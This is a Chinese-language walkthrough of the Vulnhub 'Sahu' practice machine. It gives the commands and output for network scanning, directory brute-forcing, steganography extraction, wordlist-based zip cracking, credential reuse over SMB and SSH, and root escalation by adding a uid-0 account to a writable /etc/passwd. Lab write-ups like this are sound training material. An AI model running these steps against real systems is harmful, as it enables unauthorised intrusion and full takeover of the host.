Vulnhub之Sahu靶机详细测试过程
Sahu
作者: jason_huawen
靶机基本信息
名称:sahu: 1.1
地址:
https://www.vulnhub.com/entry/sahu-11,421/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:e1:77:fc 1 60 PCS Systemtechnik GmbH
192.168.56.225 08:00:27:97:60:a8 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.225
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.225 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-15 03:09 EST
Nmap scan report for basecode.samsara.com (192.168.56.225)
Host is up (0.00024s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 230 Jan 30 2020 ftp.zip
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:78:c5:73:f2:86:cb:cb:02:7f:b6:72:85:61:ac:91 (RSA)
| 256 22:1a:ee:1a:98:4f:32:e7:dc:30:43:52:2c:b2:24:06 (ECDSA)
|_ 256 1a:9b:28:b3:ad:58:32:e9:6c:f3:ea:3b:cf:6b:08:ad (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open netbios-ssn Samba smbd 4.10.7-Ubuntu (workgroup: SAHU)
MAC Address: 08:00:27:97:60:A8 (Oracle VirtualBox virtual NIC)
Service Info: Host: SAHU-VIRTUALBOX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h50m00s, deviation: 3h10m30s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SAHU-VIRTUALBOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-12-15T08:09:43
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.7-Ubuntu)
| Computer name: sahu-virtualbox
| NetBIOS computer name: SAHU-VIRTUALBOX\x00
| Domain name: \x00
| FQDN: sahu-virtualbox
|_ System time: 2022-12-15T13:39:44+05:30
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.23 seconds
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ftp 192.168.56.225
Connected to 192.168.56.225.
220 (vsFTPd 3.0.3)
Name (192.168.56.225:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||55526|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 230 Jan 30 2020 ftp.zip
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||51511|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 133 4096 Jan 30 2020 .
drwxr-xr-x 2 0 133 4096 Jan 30 2020 ..
-rw-r--r-- 1 0 0 230 Jan 30 2020 ftp.zip
226 Directory send OK.
ftp> get ftp.zip
local: ftp.zip remote: ftp.zip
229 Entering Extended Passive Mode (|||47112|)
150 Opening BINARY mode data connection for ftp.zip (230 bytes).
100% |********************************************************************************| 230 198.94 KiB/s 00:00 ETA
226 Transfer complete.
230 bytes received in 00:00 (167.36 KiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ls
ftp.zip nmap_full_scan
得到ftp.zip文件,尝试用john工具破解失败,暂时搁置该文件的破解。
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient -L 192.168.56.225
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
sambashare Disk Samba on Ubuntu
IPC$ IPC IPC Service (sahu-VirtualBox server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
SAHU SAHU-VIRTUALBOX
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient //192.168.56.225/sambashare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient //192.168.56.225/sambashare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED
从上述返回结果看,SMB协议需要用户名和密码认证。
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ dirb http://192.168.56.225
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 15 03:24:57 2022
URL_BASE: http://192.168.56.225/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.225/ ----
==> DIRECTORY: http://192.168.56.225/H/
+ http://192.168.56.225/index.php (CODE:200|SIZE:194)
+ http://192.168.56.225/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.56.225/H/ ----
==> DIRECTORY: http://192.168.56.225/H/A/
---- Entering directory: http://192.168.56.225/H/A/ ----
==> DIRECTORY: http://192.168.56.225/H/A/R/
---- Entering directory: http://192.168.56.225/H/A/R/ ----
-----------------
END_TIME: Thu Dec 15 03:25:04 2022
DOWNLOADED: 18448 - FOUND: 2
经过多层扫描:
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225/H/A/R/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 03:26:25 Starting gobuster in directory enumeration mode
===============================================================
/Y (Status: 301) [Size: 318] [--> http://192.168.56.225/H/A/R/Y/]
Progress: 13677 / 220561 (6.20%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:27 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225/H/A/R/Y/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 03:26:36 Starting gobuster in directory enumeration mode
===============================================================
/A (Status: 301) [Size: 320] [--> http://192.168.56.225/H/A/R/Y/A/]
Progress: 3290 / 220561 (1.49%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:37 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/A/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225/H/A/R/Y/A/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 03:26:44 Starting gobuster in directory enumeration mode
===============================================================
/N (Status: 301) [Size: 322] [--> http://192.168.56.225/H/A/R/Y/A/N/]
Progress: 3094 / 220561 (1.40%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:44 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/A/N/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225/H/A/R/Y/A/N/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 03:26:52 Starting gobuster in directory enumeration mode
===============================================================
/A (Status: 301) [Size: 324] [--> http://192.168.56.225/H/A/R/Y/A/N/A/]
Progress: 3254 / 220561 (1.48%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:26:52 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ gobuster dir -u http://192.168.56.225/H/A/R/Y/A/N/A/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.225/H/A/R/Y/A/N/A/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/15 03:26:59 Starting gobuster in directory enumeration mode
===============================================================
Progress: 112562 / 220561 (51.03%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/12/15 03:27:18 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ curl http://192.168.56.225/H/A/R/Y/A/N/A/
<!DOCTYPE html>
<html>
<head>
<style>
body {background-color: black;}
h1 {color: blue;}
p {color: red;}
</style>
</head>
<body>
<h1>About Haryana</h1>
<p>
The name of Haryana instantly conjures up the image of a State which astonishingly combines both-antiquity and plenty. The Vedic land of Haryana has been a cradle of Indian culture and civilization. Indian traditions regard this region as the matrix of creation of northern altar’ where Brahma performed the pristine sacrifice and created the universe. This theory of creation has been confirmed to a large extent by archaeological investigations carried out by Guy E. Pilgrim in 1915, who has established that 15 million years ago, early man lived in the Haryana Shivaliks. The Vamana Purana states that King Kuru ploughed the field of Kurukshetra with a golden ploughshare drawn by the Nandi of Lord Shiva and reclaimed an area of seven Kosas.
Replete with myths, legends and vedic references, Haryana’s past is steeped in glory. It was on this soil that saint Ved Vyas wrote Mahabharata. It was here, 5,000 long years ago that Lord Krishna preached the gospel of duty to Arjuna at the on set of the great battle of Mahabharata:”Your right is to do your duty and not to bother about the fruits (Outcome) thereof !” Since then, this philosophy of the supremacy of duty has become a beacon to succeeding generations.
The Mahabharata knows Haryana as the land of plentiful grains (Bahudhanyaka) and immense riches (Bahudhana). Before the Mahabharata war, a battle of ten kings took place in the Kurukshetra region. But it was the Mahabharata fought for the highest values of righteousness which gave to the region world-wide fame because of the profound and sophisticated thought expounded in the holy Bhagavadgita by Lord Krishna recited to the quivering Arjuna.
The region has been the scene of many a war because of its being ‘A Gateway to North India’. As years rolled by, successive streams of the Huns, the Turks and the Tughlaqs invaded India and decisive battles were fought on this land. At the end of the 14 century, Tamur led an army through this area to Delhi. Later, the Mughals defeated the Lodhis in the historic battle of Panipat in the year 1526. Another decisive battle was fought in the year 1556 at this very site, establishing the supremacy of the Mughals for centuries to come. Towards the middle of the 18th century, the Marathas had established their sway over Haryana. The intrusion of Ahmed Shah Durrani into India, culminating Maratha ascendancy and the rapid decline of the Mughal empire, leading ultimately to the advent of the British rule.
Indeed, the history of Haryana is the saga of the struggle of a virile, righteous, forthright and proud people. From ancient times, the people of Haryana have borne the main brunt of invaders and foreign hordes with their known traits if bravery and valour. They have survived many an upheaval, upholding the traditional glory and greatness of the land to this day. The epoch-making events of yore, the martyrdom in the First War of Indian Independence in 1857, the great sacrifices in the freedom struggle, and the display of outstanding valour, unflinching courage, and heroism in recent years are all in keeping with the character of this land of action. Bold in spirit and action, the people of Haryana have formed a bulwark against forces of aggression and anti-nationalism.
Haryana has always remained a rendezvous for diverse races, cultures and faiths. It is on this soil that they met, fused and crystallized into something truly Indian. Hindu Saints and Sikh Gurus have traversed the land of Haryana spreading their message of universal love and brotherhood. Sihi in Faridabad, the birth place of great Hindi poet Surdas, is another nucleus of culture in Haryana while the legend of Lord Krishna is very evident in the lives of the people. The love for cattle and the abundance of milk in the diet of Haryanavis persists to this day which gave to the region world-wide fame.
Haryana emerged as a separate State in the federal galaxy of the Indian Republic on November 1,1966. With just 1.37% of the total geographical area and less than 2% of India’s population, Haryana has carved a place of distinction for itself during the past three decades. Whether it is agriculture or industry, canal irrigation or rural electrification, Haryana has marched towards modernity with leaps and bounds. Today, it enjoys the unique distinction in India of having provided electricity, metaled roads and potable drinking water to all its villages within record time. Haryana is among the most prosperous states in India, having one of the highest per-capita income.
.</p> #try to extract with hurrry
</body>
</html>
#try to extract with hurrry
看这是不是ftp文件的密码或者图片的密码:
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ unzip ftp.zip
Archive: ftp.zip
[ftp.zip] ftp.txt password:
password incorrect--reenter:
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ls
ftp_hash ftp.zip Haryana-1-1.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ steghide extract -sf Haryana-1-1.jpg
Enter passphrase:
wrote extracted data to "file.txt".
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ls
file.txt ftp_hash ftp.zip Haryana-1-1.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ cat file.txt
I have found the password for a zip file but i have forgote the last part of it, can you find out
5AHU**
经过尝试发现hurrry是图片的密码。
──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU@, > dict.txt
Crunch will now generate the following amount of data: 4732 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 676
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU@% >> dict.txt
Crunch will now generate the following amount of data: 1820 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU@^ >> dict.txt
Crunch will now generate the following amount of data: 6006 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 858
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU,% >> dict.txt
Crunch will now generate the following amount of data: 1820 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU%^ >> dict.txt
Crunch will now generate the following amount of data: 2310 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 330
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU^@ >> dict.txt
Crunch will now generate the following amount of data: 6006 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 858
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ crunch 6 6 -t 5AHU^% >> dict.txt
Crunch will now generate the following amount of data: 2310 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 330
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ wc -l dict.txt
3572 dict.txt
生成字典来破解FTP加密文件。
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ fcrackzip -D dict.txt ftp.zip
found id 55484135, 'dict.txt' is not a zipfile ver 2.xx, skipping
aaaaaa: No such file or directory
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ fcrackzip -u -D -p dict.txt ftp.zip
PASSWORD FOUND!!!!: pw == 5AHU#5
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ unzip ftp.zip
Archive: ftp.zip
[ftp.zip] ftp.txt password:
inflating: ftp.txt
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ cat ftp.txt
USERNAME = sahu
PASSWORD = sahu14216
得到了用户名和密码,那么它是FTP还是SMB的用户名密码,或者是SSH
──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ssh sahu@192.168.56.225
The authenticity of host '192.168.56.225 (192.168.56.225)' can't be established.
ED25519 key fingerprint is SHA256:Dnpn2cxW8+u0nsoKPgcVy0e8NudUGIvt5N8XAz25uUQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.225' (ED25519) to the list of known hosts.
sahu@192.168.56.225's password:
Permission denied, please try again.
sahu@192.168.56.225's password:
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ smbclient //192.168.56.225/sambashare -U sahu
Password for [WORKGROUP\sahu]:
Try "help" to get a list of possible commands.
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
. D 0 Thu Jan 30 03:50:23 2020
.. D 0 Thu Jan 30 02:57:06 2020
ssh.txt N 64 Thu Jan 30 03:50:02 2020
10253588 blocks of size 1024. 4423460 blocks available
smb: \> get ssh.txt
getting file \ssh.txt of size 64 as ssh.txt (31.2 KiloBytes/sec) (average 31.2 KiloBytes/sec)
smb: \> quit
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ cat ssh.txt
ssh users list
USERNAME = haryana
PASSWORD = hralltime
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$
得到了ssh用户名和密码。
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ ssh haryana@192.168.56.225
haryana@192.168.56.225's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-18-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
156 updates can be installed immediately.
77 of these updates are security updates.
To see these additional updates run: apt list --upgradable
Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings
Last login: Tue Feb 4 18:05:07 2020 from 192.168.43.111
haryana@sahu-VirtualBox:~$ id
uid=1001(haryana) gid=1001(haryana) groups=1001(haryana)
haryana@sahu-VirtualBox:~$ sudo -l
[sudo] password for haryana:
Sorry, user haryana may not run sudo on sahu-VirtualBox.
haryana@sahu-VirtualBox:~$
提权
将Linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
其中提示:
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
表明可以创建用户,并让该用户拥有root权限,实现提权:
┌──(kali㉿kali)-[~/Vulnhub/Sahu]
└─$ openssl passwd -6 -salt jason 123456
$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41
直接在目标主机上nano /etc/passwd文件,增加jason用户条目:
haryana@sahu-VirtualBox:/tmp$ nano /etc/passwd
haryana@sahu-VirtualBox:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:114::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:108:115:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:110:116:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
kernoops:x:114:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:116:122::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:117:123:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:124::/nonexistent:/bin/false
colord:x:119:125:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:120:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:121:126::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:122:127:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:123:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:124:129:Gnome Display Manager:/var/lib/gdm3:/bin/false
sahu:x:1000:1000:sahu,,,:/home/sahu:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:125:133:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
haryana:x:1001:1001:,,,:/home/haryana:/bin/bash
sshd:x:126:65534::/run/sshd:/usr/sbin/nologin
lightdm:x:127:134:Light Display Manager:/var/lib/lightdm:/bin/false
jason:$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41:0:0:root:/root:/bin/bash
然后切换到用户jason
haryana@sahu-VirtualBox:/tmp$ su - jason
Password:
root@sahu-VirtualBox:~# cd /root
root@sahu-VirtualBox:~# ls -alh
total 32K
drwx------ 4 root root 4.0K Jan 30 2020 .
drwxr-xr-x 20 root root 4.0K Jan 29 2020 ..
-rw------- 1 root root 1.5K Feb 4 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Aug 28 2019 .bashrc
drwx------ 2 root root 4.0K Oct 17 2019 .cache
drwxr-xr-x 3 root root 4.0K Jan 30 2020 .local
-rw-r--r-- 1 root root 148 Aug 28 2019 .profile
-rw-r--r-- 1 root root 123 Jan 30 2020 root.txt
root@sahu-VirtualBox:~# cat root.txt
GREATE YOU FINISH THIS TASK
CONGRATS!!!!!!!!!!!!
TELL ME ON TWITTER @VivekGautam09
root@sahu-VirtualBox:~#
经验教训
-
本靶机的目录扫描有点意思,在第一次扫描出/H目录后,访问该目录,返回forbidden,应该继续扫描其子目录,一直迭代该过程。
-
crunch工具可用来生成字典文件。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
